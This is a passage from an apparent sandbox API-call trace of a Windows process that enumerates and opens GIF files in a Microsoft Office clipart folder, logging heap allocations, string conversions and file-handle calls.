(HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.546] AreFileApisANSI () returned 1 [0100.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 69 [0100.546] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc44)) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0100.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.546] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00129_.GIF", cAlternateFileName="")) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0100.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.657] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.658] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.658] AreFileApisANSI () returned 1 [0100.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0100.658] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.658] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.658] AreFileApisANSI () returned 1 [0100.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0100.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 69 [0100.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.659] GetFileType (hFile=0x33c) returned 0x1 [0100.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0100.659] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.660] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.660] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.660] CloseHandle (hObject=0x33c) returned 1 [0100.660] AreFileApisANSI () returned 1 [0100.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0100.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 69 [0100.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.660] GetFileType (hFile=0x33c) returned 0x1 [0100.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0100.661] CloseHandle (hObject=0x33c) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.662] AreFileApisANSI () returned 1 [0100.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0100.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 69 [0100.662] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30c2)) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0100.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.662] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00130_.GIF", cAlternateFileName="")) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.663] AreFileApisANSI () returned 1 [0100.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.663] AreFileApisANSI () returned 1 [0100.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 69 [0100.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.664] GetFileType (hFile=0x33c) returned 0x1 [0100.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.665] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.665] 